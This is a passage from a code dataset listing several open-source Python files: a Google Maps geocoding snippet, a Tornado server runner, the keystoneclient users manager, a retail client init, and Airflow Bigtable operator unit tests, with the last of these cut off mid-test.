code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
# [START maps_http_geocode_place_id]
import requests
url = "https://maps.googleapis.com/maps/api/geocode/json?place_id=ChIJd8BlQ2BZwokRAFUEcm_qrcA&key=YOUR_API_KEY"
payload={}
headers = {}
response = requests.request("GET", url, headers=headers, data=payload)
print(response.text)
# [END maps_http_geocode_place_id] | googlemaps/openapi-specification | dist/snippets/maps_http_geocode_place_id/maps_http_geocode_place_id.py | Python | apache-2.0 | 320 |
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from game import app
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start() | Drvanon/Game | run.py | Python | apache-2.0 | 232 |
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from keystoneclient import base
from keystoneclient import exceptions
from keystoneclient.i18n import _, _LW
from keystoneclient import utils
LOG = logging.getLogger(__name__)
class User(base.Resource):
"""Represents an Identity user.
Attributes:
* id: a uuid that identifies the user
"""
pass
class UserManager(base.CrudManager):
"""Manager class for manipulating Identity users."""
resource_class = User
collection_key = 'users'
key = 'user'
def _require_user_and_group(self, user, group):
if not (user and group):
msg = _('Specify both a user and a group')
raise exceptions.ValidationError(msg)
@utils.positional(1, enforcement=utils.positional.WARN)
def create(self, name, domain=None, project=None, password=None,
email=None, description=None, enabled=True,
default_project=None, **kwargs):
"""Create a user.
.. warning::
The project argument is deprecated, use default_project instead.
If both default_project and project is provided, the default_project
will be used.
"""
if project:
LOG.warning(_LW("The project argument is deprecated, "
"use default_project instead."))
default_project_id = base.getid(default_project) or base.getid(project)
user_data = base.filter_none(name=name,
domain_id=base.getid(domain),
default_project_id=default_project_id,
password=password,
email=email,
description=description,
enabled=enabled,
**kwargs)
return self._create('/users', {'user': user_data}, 'user',
log=not bool(password))
@utils.positional(enforcement=utils.positional.WARN)
def list(self, project=None, domain=None, group=None, default_project=None,
**kwargs):
"""List users.
If project, domain or group are provided, then filter
users with those attributes.
If ``**kwargs`` are provided, then filter users with
attributes matching ``**kwargs``.
.. warning::
The project argument is deprecated, use default_project instead.
If both default_project and project is provided, the default_project
will be used.
"""
if project:
LOG.warning(_LW("The project argument is deprecated, "
"use default_project instead."))
default_project_id = base.getid(default_project) or base.getid(project)
if group:
base_url = '/groups/%s' % base.getid(group)
else:
base_url = None
return super(UserManager, self).list(
base_url=base_url,
domain_id=base.getid(domain),
default_project_id=default_project_id,
**kwargs)
def get(self, user):
return super(UserManager, self).get(
user_id=base.getid(user))
@utils.positional(enforcement=utils.positional.WARN)
def update(self, user, name=None, domain=None, project=None, password=None,
email=None, description=None, enabled=None,
default_project=None, **kwargs):
"""Update a user.
.. warning::
The project argument is deprecated, use default_project instead.
If both default_project and project is provided, the default_project
will be used.
"""
if project:
LOG.warning(_LW("The project argument is deprecated, "
"use default_project instead."))
default_project_id = base.getid(default_project) or base.getid(project)
user_data = base.filter_none(name=name,
domain_id=base.getid(domain),
default_project_id=default_project_id,
password=password,
email=email,
description=description,
enabled=enabled,
**kwargs)
return self._update('/users/%s' % base.getid(user),
{'user': user_data},
'user',
method='PATCH',
log=False)
def update_password(self, old_password, new_password):
"""Update the password for the user the token belongs to."""
if not (old_password and new_password):
msg = _('Specify both the current password and a new password')
raise exceptions.ValidationError(msg)
if old_password == new_password:
msg = _('Old password and new password must be different.')
raise exceptions.ValidationError(msg)
params = {'user': {'password': new_password,
'original_password': old_password}}
base_url = '/users/%s/password' % self.api.user_id
return self._update(base_url, params, method='POST', log=False,
endpoint_filter={'interface': 'public'})
def add_to_group(self, user, group):
self._require_user_and_group(user, group)
base_url = '/groups/%s' % base.getid(group)
return super(UserManager, self).put(
base_url=base_url,
user_id=base.getid(user))
def check_in_group(self, user, group):
self._require_user_and_group(user, group)
base_url = '/groups/%s' % base.getid(group)
return super(UserManager, self).head(
base_url=base_url,
user_id=base.getid(user))
def remove_from_group(self, user, group):
self._require_user_and_group(user, group)
base_url = '/groups/%s' % base.getid(group)
return super(UserManager, self).delete(
base_url=base_url,
user_id=base.getid(user))
def delete(self, user):
return super(UserManager, self).delete(
user_id=base.getid(user))
| ging/python-keystoneclient | keystoneclient/v3/users.py | Python | apache-2.0 | 6,977 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .client import SearchServiceClient
from .async_client import SearchServiceAsyncClient
__all__ = (
"SearchServiceClient",
"SearchServiceAsyncClient",
)
| googleapis/python-retail | google/cloud/retail_v2/services/search_service/__init__.py | Python | apache-2.0 | 765 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from typing import List, Dict
import google.api_core.exceptions
from google.cloud.bigtable.column_family import MaxVersionsGCRule
from google.cloud.bigtable.instance import Instance
from google.cloud.bigtable.table import ClusterState
from parameterized import parameterized
from airflow import AirflowException
from airflow.contrib.operators.gcp_bigtable_operator import \
BigtableInstanceDeleteOperator, \
BigtableTableDeleteOperator, \
BigtableTableCreateOperator, \
BigtableTableWaitForReplicationSensor, \
BigtableClusterUpdateOperator, \
BigtableInstanceCreateOperator
from tests.compat import mock
PROJECT_ID = 'test_project_id'
INSTANCE_ID = 'test-instance-id'
CLUSTER_ID = 'test-cluster-id'
CLUSTER_ZONE = 'us-central1-f'
GCP_CONN_ID = 'test-gcp-conn-id'
NODES = 5
TABLE_ID = 'test-table-id'
INITIAL_SPLIT_KEYS = [] # type: List
EMPTY_COLUMN_FAMILIES = {} # type: Dict
class BigtableInstanceCreateTest(unittest.TestCase):
@parameterized.expand([
('instance_id', PROJECT_ID, '', CLUSTER_ID, CLUSTER_ZONE),
('main_cluster_id', PROJECT_ID, INSTANCE_ID, '', CLUSTER_ZONE),
('main_cluster_zone', PROJECT_ID, INSTANCE_ID, CLUSTER_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id,
main_cluster_id,
main_cluster_zone, mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableInstanceCreateOperator(
project_id=project_id,
instance_id=instance_id,
main_cluster_id=main_cluster_id,
main_cluster_zone=main_cluster_zone,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_create_instance_that_exists(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
op = BigtableInstanceCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_instance.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_create_instance_that_exists_empty_project_id(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
op = BigtableInstanceCreateOperator(
instance_id=INSTANCE_ID,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_instance.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
mock_hook.return_value.get_instance.return_value = None
op = BigtableInstanceCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.create_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_instance.assert_called_once_with(
cluster_nodes=None,
cluster_storage_type=None,
instance_display_name=None,
instance_id=INSTANCE_ID,
instance_labels=None,
instance_type=None,
main_cluster_id=CLUSTER_ID,
main_cluster_zone=CLUSTER_ZONE,
project_id=PROJECT_ID,
replica_cluster_id=None,
replica_cluster_zone=None,
timeout=None
)
class BigtableClusterUpdateTest(unittest.TestCase):
@parameterized.expand([
('instance_id', PROJECT_ID, '', CLUSTER_ID, NODES),
('cluster_id', PROJECT_ID, INSTANCE_ID, '', NODES),
('nodes', PROJECT_ID, INSTANCE_ID, CLUSTER_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id,
cluster_id, nodes, mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableClusterUpdateOperator(
project_id=project_id,
instance_id=instance_id,
cluster_id=cluster_id,
nodes=nodes,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_but_instance_does_not_exists(self, mock_hook):
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(str(err), "Dependency: instance '{}' does not exist.".format(
INSTANCE_ID))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_but_instance_does_not_exists_empty_project_id(self,
mock_hook):
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(str(err), "Dependency: instance '{}' does not exist.".format(
INSTANCE_ID))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_that_does_not_exists(self, mock_hook):
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.update_cluster.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Cluster not found."))
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Dependency: cluster '{}' does not exist for instance '{}'.".format(
CLUSTER_ID, INSTANCE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_called_once_with(
instance=instance, cluster_id=CLUSTER_ID, nodes=NODES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_updating_cluster_that_does_not_exists_empty_project_id(self, mock_hook):
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.update_cluster.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Cluster not found."))
with self.assertRaises(AirflowException) as e:
op = BigtableClusterUpdateOperator(
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Dependency: cluster '{}' does not exist for instance '{}'.".format(
CLUSTER_ID, INSTANCE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_called_once_with(
instance=instance, cluster_id=CLUSTER_ID, nodes=NODES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
op = BigtableClusterUpdateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
cluster_id=CLUSTER_ID,
nodes=NODES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.update_cluster.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.update_cluster.assert_called_once_with(
instance=instance, cluster_id=CLUSTER_ID, nodes=NODES)
class BigtableInstanceDeleteTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_delete_execute(self, mock_hook):
op = BigtableInstanceDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_delete_execute_empty_project_id(self, mock_hook):
op = BigtableInstanceDeleteOperator(
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=None,
instance_id=INSTANCE_ID)
@parameterized.expand([
('instance_id', PROJECT_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableInstanceDeleteOperator(
project_id=project_id,
instance_id=instance_id,
task_id="id"
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_instance_that_doesnt_exists(self, mock_hook):
op = BigtableInstanceDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Instance not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_instance_that_doesnt_exists_empty_project_id(self, mock_hook):
op = BigtableInstanceDeleteOperator(
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Instance not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=None,
instance_id=INSTANCE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
op = BigtableInstanceDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_instance.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_instance.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID)
class BigtableTableDeleteTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_delete_execute(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
@parameterized.expand([
('instance_id', PROJECT_ID, '', TABLE_ID),
('table_id', PROJECT_ID, INSTANCE_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, table_id,
mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableTableDeleteOperator(
project_id=project_id,
instance_id=instance_id,
table_id=table_id,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_table_that_doesnt_exists(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Table not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_table_that_doesnt_exists_empty_project_id(self, mock_hook):
op = BigtableTableDeleteOperator(
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Table not found."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=None,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_deleting_table_when_instance_doesnt_exists(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(str(err), "Dependency: instance '{}' does not exist.".format(
INSTANCE_ID))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_different_error_reraised(self, mock_hook):
op = BigtableTableDeleteOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.delete_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.GoogleAPICallError('error'))
with self.assertRaises(google.api_core.exceptions.GoogleAPICallError):
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.delete_table.assert_called_once_with(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID)
class BigtableTableCreateTest(unittest.TestCase):
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_create_execute(self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_table.assert_called_once_with(
instance=instance,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES)
@parameterized.expand([
('instance_id', PROJECT_ID, '', TABLE_ID),
('table_id', PROJECT_ID, INSTANCE_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, table_id,
mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableTableCreateOperator(
project_id=project_id,
instance_id=instance_id,
table_id=table_id,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_instance_not_exists(self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_instance.return_value = None
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Dependency: instance '{}' does not exist in project '{}'.".format(
INSTANCE_ID, PROJECT_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists(self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_column_families_for_table.return_value = \
EMPTY_COLUMN_FAMILIES
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_table.assert_called_once_with(
instance=instance,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists_empty_project_id(self, mock_hook):
op = BigtableTableCreateOperator(
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_column_families_for_table.return_value = \
EMPTY_COLUMN_FAMILIES
instance = mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
op.execute(None)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
mock_hook.return_value.create_table.assert_called_once_with(
instance=instance,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists_with_different_column_families_ids_in_the_table(
self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families=EMPTY_COLUMN_FAMILIES,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
mock_hook.return_value.get_column_families_for_table.return_value = {
"existing_family": None}
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Table '{}' already exists with different Column Families.".format(TABLE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_creating_table_that_exists_with_different_column_families_gc_rule_in__table(
self, mock_hook):
op = BigtableTableCreateOperator(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
initial_split_keys=INITIAL_SPLIT_KEYS,
column_families={"cf-id": MaxVersionsGCRule(1)},
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
cf_mock = mock.Mock()
cf_mock.gc_rule = mock.Mock(return_value=MaxVersionsGCRule(2))
mock_hook.return_value.get_column_families_for_table.return_value = {
"cf-id": cf_mock
}
mock_hook.return_value.create_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.AlreadyExists("Table already exists."))
with self.assertRaises(AirflowException) as e:
op.execute(None)
err = e.exception
self.assertEqual(
str(err),
"Table '{}' already exists with different Column Families.".format(TABLE_ID)
)
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
class BigtableWaitForTableReplicationTest(unittest.TestCase):
@parameterized.expand([
('instance_id', PROJECT_ID, '', TABLE_ID),
('table_id', PROJECT_ID, INSTANCE_ID, ''),
], testcase_func_name=lambda f, n, p: 'test_empty_attribute.empty_' + p.args[0])
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_empty_attribute(self, missing_attribute, project_id, instance_id, table_id,
mock_hook):
with self.assertRaises(AirflowException) as e:
BigtableTableWaitForReplicationSensor(
project_id=project_id,
instance_id=instance_id,
table_id=table_id,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
err = e.exception
self.assertEqual(str(err), 'Empty parameter: {}'.format(missing_attribute))
mock_hook.assert_not_called()
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_no_instance(self, mock_hook):
mock_hook.return_value.get_instance.return_value = None
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertFalse(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_no_table(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.get_cluster_states_for_table.side_effect = mock.Mock(
side_effect=google.api_core.exceptions.NotFound("Table not found."))
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
self.assertFalse(op.poke(None))
mock_hook.assert_called_once_with(gcp_conn_id=GCP_CONN_ID)
@mock.patch('airflow.contrib.operators.gcp_bigtable_operator.BigtableHook')
def test_wait_not_ready(self, mock_hook):
mock_hook.return_value.get_instance.return_value = mock.Mock(Instance)
mock_hook.return_value.get_cluster_states_for_table.return_value = {
"cl-id": ClusterState(0)
}
op = BigtableTableWaitForReplicationSensor(
project_id=PROJECT_ID,
instance_id=INSTANCE_ID,
table_id=TABLE_ID,
task_id="id",
gcp_conn_id=GCP_CONN_ID
)
